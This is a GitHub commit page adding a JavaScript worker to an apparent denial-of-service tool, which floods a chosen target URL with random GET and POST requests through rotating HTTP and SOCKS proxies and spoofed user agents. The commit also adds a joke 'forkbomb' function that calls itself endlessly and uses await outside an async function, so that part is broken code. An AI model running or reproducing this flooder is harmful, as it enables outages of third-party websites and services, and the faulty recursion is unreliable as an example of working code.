feature: HTTP forkbomb attack

Basically HTTP attack but with an integrated forkbomb to bombard target even more :3

Warranty doesn't cover the client's computer being bombarded too
This commit is contained in:
c0d1ng_ma5ter 2025-01-22 14:30:54 -06:00 committed by GitHub
parent 289eff9ac1
commit 0c51228ee4
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -0,0 +1,90 @@
//Get Miku'd :3
/*
/|<\/>|\
/ /__\  /__\ \
\_\_| |__/_/
MIKU MIKU BEAM!
*/
import axios from "axios";
import { SocksProxyAgent } from "socks-proxy-agent";
import { parentPort, workerData } from "worker_threads";
import { randomBoolean, randomString } from "../utils/randomUtils.js";
const FORK = (fixedTarget, payload, config) => {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
}
const startAttack = () => {
const { target, proxies, userAgents, duration, packetDelay, packetSize } =
workerData;
const fixedTarget = target.startsWith("http") ? target : `https://${target}`;
let totalPackets = 0;
const startTime = Date.now();
const sendRequest = async (proxy, userAgent) => {
try {
const config = {
headers: { "User-Agent": userAgent },
timeout: 2000,
validateStatus: (status) => {
return status < 500;
},
};
if (proxy.protocol === "http") {
config.proxy = {
host: proxy.host,
port: proxy.port,
};
} else if (proxy.protocol === "socks4" || proxy.protocol === "socks5") {
config.httpAgent = new SocksProxyAgent(
`${proxy.protocol}://${proxy.host}:${proxy.port}`
);
}
const isGet = packetSize > 64 ? false : randomBoolean();
const payload = randomString(packetSize);
if (isGet) {
await axios.get(`${fixedTarget}/${payload}`, config);
} else {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
}
totalPackets++;
parentPort.postMessage({
log: `✅ Request successful from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
totalPackets,
});
} catch (error) {
parentPort.postMessage({
log: `❌ Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`,
totalPackets,
});
}
};
const interval = setInterval(() => {
const elapsedTime = (Date.now() - startTime) / 1000;
if (elapsedTime >= duration) {
clearInterval(interval);
parentPort.postMessage({ log: "Attack finished", totalPackets });
process.exit(0);
}
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
sendRequest(proxy, userAgent);
}, packetDelay);
};
if (workerData) {
startAttack();
}